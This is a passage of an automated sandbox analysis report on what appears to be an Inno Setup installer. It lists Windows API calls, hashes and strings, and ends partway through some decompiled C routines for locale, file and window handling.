                                                            APIs
                                                              • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                            • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Type$FullLoadNamePathRegister
                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                            • API String ID: 4170313675-2435364021
                                                            • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                            • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                              • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                              • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                              • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                              • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                            • String ID: DeleteFile$MoveFile
                                                            • API String ID: 3947864702-139070271
                                                            • Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                            • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                            • Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                            • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                              • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                              • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                              • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                              • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                            • String ID: \UA$dUA
                                                            • API String ID: 503893064-3864016770
                                                            • Opcode ID: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                            • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                            • Opcode Fuzzy Hash: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                            • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                            • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsWindowVisible.USER32 ref: 005B95A3
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                            • SetWindowLongW.USER32 ref: 005B95FF
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$Long$Visible
                                                            • String ID:
                                                            • API String ID: 2967648141-0
                                                            • Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                            • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                            • Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                            • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                            • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                            • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                            • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                            • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                            • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                            • GetPropW.USER32 ref: 0050E99A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                            • String ID:
                                                            • API String ID: 2582817389-0
                                                            • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                            • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                            • String ID:
                                                            • API String ID: 215268677-0
                                                            • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                            • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004F5551
                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                            • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                            • ReleaseDC.USER32 ref: 004F557F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MetricsObjectReleaseSelectText
                                                            • String ID:
                                                            • API String ID: 2013942131-0
                                                            • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                            • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: /INITPROCWND=$%x $@
                                                            • API String ID: 2353593579-4169826103
                                                            • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                            • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                              • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocInitStringVariant
                                                            • String ID: FYC$kYC
                                                            • API String ID: 4010818693-1629163012
                                                            • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                            • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                              • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                              • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                            Strings
                                                            • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                            • String ID: Detected restart. Removing temporary directory.
                                                            • API String ID: 1717587489-3199836293
                                                            • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                            • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                              • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                            • API String ID: 1883125708-2676053874
                                                            • Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                            • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                            • Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                            • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                            • API String ID: 1883125708-2866557904
                                                            • Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                            • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                            • Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                            • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 1646373207-1816364905
                                                            • Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                            • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                            • Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                            • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                            • API String ID: 1646373207-2498399450
                                                            • Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                            • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                            • Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                            • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                            • API String ID: 1646373207-260599015
                                                            • Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                            • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                            • Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                            • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                            • API String ID: 1646373207-834958232
                                                            • Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                            • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                            • Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                            • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            C-Code - Quality: 73%
                                                            			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                            				char _v8;
                                                            				short _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				void* _t29;
                                                            				void* _t40;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t55;
                                                            				void* _t61;
                                                            
                                                            				_push(__ebx);
                                                            				_v24 = 0;
                                                            				_v20 = 0;
                                                            				_t44 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t61);
                                                            				_push(0x40b104);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t61 + 0xffffffec;
                                                            				_t21 =  &_v16;
                                                            				L00403730();
                                                            				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                            				E0040858C( &_v20, 4,  &_v16);
                                                            				E0040873C(_t44, _v20, _v8);
                                                            				_t29 = E0040AEF4( *_t44, _t44); // executed
                                                            				if(_t29 == 0) {
                                                            					_v12 = 0;
                                                            					E0040858C( &_v24, 4,  &_v16);
                                                            					E0040873C(_t44, _v24, _v8);
                                                            					_t40 = E0040AEF4( *_t44, _t44); // executed
                                                            					if(_t40 == 0) {
                                                            						E00407A20(_t44);
                                                            					}
                                                            				}
                                                            				_pop(_t55);
                                                            				 *[fs:eax] = _t55;
                                                            				_push(E0040B10B);
                                                            				E00407A80( &_v24, 2);
                                                            				return E00407A20( &_v8);
                                                            			}













                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                              • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                              • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                            • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0040AEF4(char __eax, signed int __ebx) {
                                                            				char _v8;
                                                            				struct _WIN32_FIND_DATAW _v600;
                                                            				void* _t15;
                                                            				intOrPtr _t24;
                                                            				void* _t27;
                                                            
                                                            				_push(__ebx);
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t27);
                                                            				_push(0x40af52);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t27 + 0xfffffdac;
                                                            				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
                                                            				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                            					FindClose(_t15);
                                                            				}
                                                            				_pop(_t24);
                                                            				 *[fs:eax] = _t24;
                                                            				_push(E0040AF59);
                                                            				return E00407A20( &_v8);
                                                            			}








                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                            • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				long _t39;
                                                            				_Unknown_base(*)()* _t42;
                                                            				_Unknown_base(*)()* _t43;
                                                            				_Unknown_base(*)()* _t46;
                                                            				signed int _t51;
                                                            				void* _t111;
                                                            				void* _t112;
                                                            				intOrPtr _t129;
                                                            				struct HINSTANCE__* _t148;
                                                            				intOrPtr* _t150;
                                                            				intOrPtr _t152;
                                                            				intOrPtr _t153;
                                                            
                                                            				_t152 = _t153;
                                                            				_t112 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t112 = _t112 - 1;
                                                            				} while (_t112 != 0);
                                                            				_push(_t152);
                                                            				_push(0x4b5388);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t153;
                                                            				 *0x4be664 =  *0x4be664 - 1;
                                                            				if( *0x4be664 >= 0) {
                                                            					L19:
                                                            					_pop(_t129);
                                                            					 *[fs:eax] = _t129;
                                                            					_push(0x4b538f);
